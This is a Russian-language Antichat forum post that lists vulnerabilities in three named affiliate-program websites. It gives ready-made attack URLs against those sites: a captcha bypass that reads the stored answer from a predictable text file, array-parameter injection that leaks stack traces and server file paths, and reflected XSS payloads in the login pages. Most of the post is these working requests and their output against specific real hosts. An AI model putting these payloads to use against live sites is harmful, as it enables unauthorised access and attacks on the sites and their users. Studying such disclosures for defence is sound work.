Форум АНТИЧАТ - Мелкие баги партнерок.

Мельком пробежался по разделу партнерок. Сразу были обнаружены мелкие уязвимости. судя по виду 3 партнерки на одном двиге сидят.

1) Сорви БОЛЬШОЙ КУШ! Мега-конверт ру-траффа!
https://forum.antichat.ru/thread148939.html

Капча вида:
http://ru-adult.biz/captcha/captcha_img.php?1256541971_41&params=100,40,0,20
Обход:
http://ru-adult.biz/captcha/data/1256541971_41.txt
Найдено так:
http://ru-adult.biz/captcha/captcha_img.php?125654197'1_41&params=100,40,0,20

плохая фильтрация данных:
http://ru-adult.biz/login.php?username[]=12

Цитата:

#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/gex/biz-adult.ru/Common/func.affiliates.php:398] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/gex/biz-adult.ru/login.php:180]

Array encountered!
Array (
0 => 12
)

И следовательно XSS

http://ru-adult.biz/login.php?username[]=<script>alert()</script>

2) Партнерская программа "СмсКоровка"
https://forum.antichat.ru/thread150027.html

аналогичный баг
http://sekrety-vk.ru/enter.php?password[]=1212

Цитата:

#0 sqlPrep(Array ([0] => 1212)) called at [/usr/local/www/dateintim/sekrety-vk.ru/Includes/func.clients.php:225] #1 GetClientsListByField(Array ([0] => sms_need,[1] => sms_code), Array ([0] => 0,[1] => Array ([0] => 1212))) called at [/usr/local/www/dateintim/sekrety-vk.ru/enter.php:55]

Array encountered!
Array (
0 => 1212
)

И такаяже XSS

3) Для трафа ВКонтакте (1k-350$)
https://forum.antichat.ru/thread151110.html

тоже самое:

http://smskorovka.ru/login.php?username[]=12

Цитата:

#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/dateintim/smskorovka.ru/Includes/func.affiliates.php:417] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/dateintim/smskorovka.ru/login.php:20]

Array encountered!
Array (
0 => 12
)

и всё таже XSS

http://smskorovka.ru/login.php?username[]=%3Cscript%3Ealert()%3C/script%3E